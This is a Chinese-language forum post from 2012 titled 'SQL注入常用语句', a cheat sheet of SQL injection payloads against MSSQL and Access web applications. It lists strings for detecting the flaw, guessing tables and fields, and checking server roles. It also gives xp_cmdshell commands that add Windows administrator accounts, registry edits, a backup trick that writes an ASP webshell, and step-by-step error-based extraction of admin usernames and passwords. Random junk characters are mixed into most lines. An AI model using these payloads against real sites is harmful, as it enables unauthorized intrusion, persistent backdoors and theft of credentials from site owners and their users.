中国网络渗透测试联盟

标题: SQL注入常用语句 [打印本页]

作者: admin    时间: 2012-9-15 14:31
标题: SQL注入常用语句
1.判断是否有注入 9 ^, W/ |$ X7 h# u+ t! u9 d
;and 1=1 # |9 @4 e5 d( T9 W/ O+ S/ \
;and 1=2
# V8 j8 L( k. i9 s9 b
: B  P1 y7 O% r& q3 W2.初步判断是否是mssql * a/ j, u0 f, a! K+ q
;and user>0 8 {5 ~; a* v: g2 b

* l! h; i9 W0 k3 F3.判断数据库系统
! Z4 [4 e9 q8 r$ D;and (select count(*) from sysobjects)>0 mssql
- P" ]* o7 v; I  R6 u/ H. I: P! M;and (select count(*) from msysobjects)>0 access ( h/ v* L- A: Q& b3 o8 T
4 r# F, ?7 ^* E. y$ K7 R
4.注入参数是字符 0 x$ U: b% @* U) x8 B
'and [查询条件] and ''='
( g( A5 L* v+ l5 k' ^- G
' b& h* |! e, w. G; V+ J  ~5.搜索时没过滤参数的 5 v: r/ @; U6 F0 `. ^+ p9 e
'and [查询条件] and '%25'=' ; J6 y" z" E' ~1 V3 G- o4 a: Z

# q$ [" k1 g$ K9 L! W% x! b6.猜数表名 8 z* M; n9 X9 [/ ?% n
;and (select Count(*) from [表名])>0
* M5 V7 y/ F& x6 [/ x2 w/ e2 Z" S' d2 F5 \/ b. `
7.猜字段 ! W3 l( V9 A( K* K4 X
;and (select Count(字段名) from 表名)>0 ) M3 _* d. P  c( _5 s

1 G9 p2 P- w8 c# A$ ?8.猜字段中记录长度 % R& r( X2 s' n* ~' X3 ^
;and (select top 1 len(字段名) from 表名)>0
% z* I6 _3 I- i# Z/ o4 X+ K' I: G! }. h1 N4 x' W
9.(1)猜字段的ascii值(access) ) c4 A% m! \8 b! V, D
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
( G0 m* J. q+ V" V, x+ m. W7 C2 y' H9 E0 T" C  q1 O0 j" v
(2)猜字段的ascii值(mssql) ( Y: c4 f' g/ r- j# S
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
( L$ @3 u% x1 b, V  b) o/ W2 e% I; s8 ^* Y' ~
10.测试权限结构(mssql)
2 n4 M' E8 g* H9 c. O;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
) t  ^/ p) o) N" |/ b$ ^& Y: g;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
1 ?$ C7 w' F4 a: q! C;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
- I* s1 m# @8 [6 \) j;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- % f& k& u3 Z5 M& k5 Z+ B
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
7 |, ~- }$ i9 o5 t8 j% @;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1 p9 z! F* n" v6 ~6 C' b
;and 1=(select IS_MEMBER('db_owner'));--
9 z3 E& K$ H% _4 N, E3 d- y) v7 B7 s5 X% a
11.添加mssql和系统的帐户 ( g4 h1 E* G$ `( d, x* V8 f
;exec master.dbo.sp_addlogin username;-- # J: R: ~( {7 Z4 j
;exec master.dbo.sp_password null,username,password;--
8 ?, H* j) l. y;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ( q, z  Y$ A& g7 R
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- $ a: h2 z5 i0 D6 \7 L, e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 5 ]" g* \5 D) }
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- " f& y, {2 ~  Z3 X2 I! K' f
9 D8 c6 c7 ~2 Z+ R- B5 S
12.(1)遍历目录
5 W/ F/ R! I2 ?/ c7 n/ R3 g;create table dirs(paths varchar(100), id int) + \8 \/ u, J) T% Y' l
;insert dirs exec master.dbo.xp_dirtree 'c:\' / U( R* V4 ]! P$ t) z2 G
;and (select top 1 paths from dirs)>0
5 Z( s! {  P0 J6 H+ T( O6 ~0 |) ^4 U;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
" ^( w4 P% O/ j/ U$ ]
4 u! Z, Y7 I* W* d( y(2)遍历目录
  x7 ^0 }; Y6 s;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- / U$ w$ u3 B) Q1 \% Q4 t
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   K3 a$ s; W7 l5 o9 R6 p1 V# @
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
9 ?7 i$ L4 A6 R;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 2 `: G" r# b1 M- W+ K  ?
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
% S4 H, n) m0 S/ {1 `
' l' g- d2 q! z1 U- F$ T, K1 A13.mssql中的存储过程
1 \/ j( s2 t/ B: l& J' Y* |xp_regenumvalues 注册表根键, 子键
3 N* p# n5 n0 H7 A0 g8 D9 X;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值   J% r3 h/ z5 v& b' w% Q0 ~' r4 x
xp_regread 根键,子键,键值名 ! S  m2 }5 ?; b# ]
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 , h6 \3 a) D4 d* w8 i2 a
xp_regwrite 根键,子键, 值名, 值类型, 值 2 N, v+ i5 `- P" Q  ^
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ! i; B$ \% @) p! L
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello' 写入注册表 . j# b/ F& `4 G# v' J: s: t
xp_regdeletevalue 根键,子键,值名
# X9 d  E( e2 wexec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' 删除某个值 8 d. g- z+ S7 Z$ @
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
3 ^1 [9 ?% Z$ u' \
. s+ U, t: y* Q7 e, _' ^14.mssql的backup创建webshell
5 n% S" ^; b9 g  `+ Ouse model
2 R5 |4 j1 h* U  {3 Ucreate table cmd(str image); 1 L) V3 Q- P: B  I1 D5 b' ~
insert into cmd(str) values ('<% Dim oScript %>');
/ J4 F% }( Y1 |/ _' {7 o3 |1 r/ nbackup database model to disk='c:\l.asp';
* c5 q7 b; e5 A1 t, ^9 O% s' U+ B; L5 x2 g, y& q( o6 }9 J3 [
15.mssql内置函数 / W9 [  J  |! g8 y( i6 t
;and (select @@version)>0 获得Windows的版本号 : W) T* ~; d  ^- L/ Y
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
: I0 Q0 ~. e- L9 W3 K2 i;and (select user_name())>0 爆当前系统的连接用户
8 {/ h# j" d- {$ R: {  h;and (select db_name())>0 得到当前连接的数据库
; H$ u, ?9 K; q8 ?  K# ^  h% S- L+ V

3 h9 B# Z% X, r6 \6 c2 @$ D& X8 `: r2 }# |5 c+ ]% _# z
MSSQL手注暴库
0 o5 o8 R% n7 p8 i$ _
- G$ v! f5 \- b: Z& C6 ~- W0 e2 B1 z; y1.暴出当前表名和列名
0 z* d' j# t' q在注入点后提交“'having 1=1--",得到返回信息为英文,在这段英文中即可看到一个表名和一个列名。提交“group by 暴出的表名列名having 1=1--",可得到另一个列名;继续提交“group by 暴了的表名列名,暴出的表名.第2个列名 having 1=1--",可再得到一个列名。用同样的方法提交,直到页面不再返回错误信息,就可以得到所有的列名。小知识:暴表名与列名是在SQL语句中“having 1=1—"与GROUP BY结合使用,进行条件判断的。由于语句不完整,因此数据库返回错误信息,并显示一个表名和一个列名。基本方法只能暴出数据库中的当前表,如果某个表中包含的列名非常多,用上基本方法就非常困难了。# U$ K; o: i5 T  q* |

/ O# y3 T6 U/ F5 Z* u4 r第一.爆出所有数据库名( D# |' f  d  x! L6 s1 \" D
利用“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])"语句,暴出数据库中任意表名和列名,其中“[N]"表示数据库中的第N个表。
! i% q7 d4 }1 k2 D8 v第一步:在注入点后提交如下语句:“and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=12)",因为 dbid 的值从1到5,是系统使用的,所以用户自己建的一定是从6开始的,并且我们提交了 name>1,name字段是一个字符型的字段,和数字比较会出错因此在提交后,IE会返回如下的信息:“Microsoft OLE DB Provider for ODBC Drivers 错误 ?e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Northwind' 转换为数据类型为 int 的列时发生语法错误。",这样就把name字段的值暴出来了,也就是我们得到了一个库名“Northwind"。改变“dbid"的值可以得出所有的库名。2 |4 j3 H5 D# W- _

" Q" ?) d' B( C" r4 m: Y9 B2 i  Cand 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])--  修改N从6开始爆出所有数据库名
; ~! R3 L9 C. F6 T( a* G! R& J
! G+ r* a7 y3 b7 W
2 n( Z( O- S* U第二.爆出指定库中的所有表名
, |- X* l: d# b8 Q& C5 @7 F. `得到了库名后,现在要得到库中所有的表名,提交如下语句:"and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U') ",这里要暴的是master这个库中的表名,查询的SQL语句返回的是name的值,然后和数字0比较,这样就会暴露出name的值。提交后一个表名为“'spt_monito"就被暴出来了。, `4 I: T& }6 m8 z& A8 a) f( G
再接着暴其他的表,继续提交如下语句:“and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U' and name not in('spt_monito'))"提交后,又暴出一个表名为"cd512"。依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出所有的表名。, {, O+ f* n4 {0 `
5 H2 J" k  ~7 k+ t! X- k" k$ L3 `5 \
and 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U')--3 |5 D! a" t3 d
and 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]'))--
  Y2 u, p% l5 ^# J4 J1 o5 X" ?and 0<>(select top 1 name from [指定库名].dbo.sysobjects where xtype='U' and name not in('[爆出的表名]','[爆出的第二表名]'))--
) L9 V) n$ p; L, W. T( H2 w9 a  S8 F  p& Q
4.爆出指定表中的所有列名
4 E% E% J* Z' f$ S. \! e/ dand 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) $ p* d! F, A+ S" q! [
//把ID值转成字符型后再和一个整型值比较。ID号出来了。值为:949578421  name='表名', _; J! |! u9 {4 w0 `. s3 L$ W
0 x6 I2 z0 [  D( B# u7 t
and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421)--  爆出admin表中的一个字段名. S; Z/ R, i, A, Z. P5 ]
% t- g6 R: P2 M* c
再提交and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421 and name not in('adduser'))-- 2 n/ u$ f- q/ j, D7 g% \! o
依次提交"and name not in(' spt_monito',' cd512',..))"就可以查出admin表中的所有字段名。
/ r* g/ D" ~4 c6 o: C9 V
# v% M, q& [1 _( P/ F& @5 R( ]( F& r4 x8 ?* M
and 0<>(select count(*) from [指定库名].dbo.sysobjects where xtype='U' and name='[要爆字段的表名]' and uid>(str(id)))--  爆出要爆字段的表名id值/ Z) O7 @8 U0 T8 M! ~2 \5 s

% ~. D+ u* K2 B# P" R) g% Qand 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值)-- 爆出id值表中的一个字段名
- @4 q+ A( i& I+ V
# S1 m  }& k2 ^* ]7 Y+ Mand 0<>(select top 1 name from [指定库名].dbo.syscolumns where id=爆出的id值 and name not in('[爆出的字段名]'))-- 6 _6 v9 B& ?. E& t% I5 ]: {! Z

0 Y/ k3 ]5 ?( W6 g5 B; o5 s2 Q( a; a/ b
# [( `+ P- ~: h: k; U4 X! q" p3 {% A8 v8 Y* [! e
5.读取指定表中的数据
+ r( A1 e  t; b6 S- t+ }( ?, e4 e$ g
and 0<(select A_ID from wutong.dbo.admin where A_UserID>1)-- 爆出A_PWD的内容 $ l7 W" r) W9 I) T' L

# ^) f& _4 E. L- {3 Xand 0<(select [一个存在的字段] from [指定库名].dbo.[要查询的表名] where [要爆内容的字段名]>1)--
9 P) w8 `4 j7 W- e8 ^8 e
; A, p' w8 X! p* V6 band 0<(select A_ID from wutong.dbo.admin where A_PWD>1 and A_UserID='admin')-- 爆出admin的密码
( d. _# z" U3 u0 C5 f# r( x
3 E* ]+ w" q, R  @! t3 e* d: n  a9 P9 s% b: [/ d
and 0<(Select Top 1 A_UserID FROM admin where A_ID<>1)--  爆出id<>1的管理员名字(fuhao)
" g+ u# ^3 Z  A- o0 ]8 L5 n5 }7 Z1 @+ d1 W! f4 j
and 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao')-- 爆出第二个管理员的名字 <>不等于(tuiguang)
1 l' U) ~9 F8 R) X: g7 ~0 {7 j$ F5 v- j$ |4 \. |; J
and 0<(Select Top 1 A_UserID FROM admin where  A_ID <>1 and A_UserID <> 'fuhao'and A_UserID <> 'tuiguang')--
& q- b8 L; V4 `: y$ y( _
- z( ^/ Y5 u: v5 {* K$ q/ |知道了数据库的表名、列名后,可以利用“查询语句"读取数据库中的任意信息。例如要读取某个表中某列中的第N个数据,可提交语句:“and (Select Top 1 列名 FROM 表名 where id=[N])>1"( [N]代表列中的第N条数据),从IE返回信息中即可得知想要的数据。
2 b2 e4 O2 m! ^# L' H




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2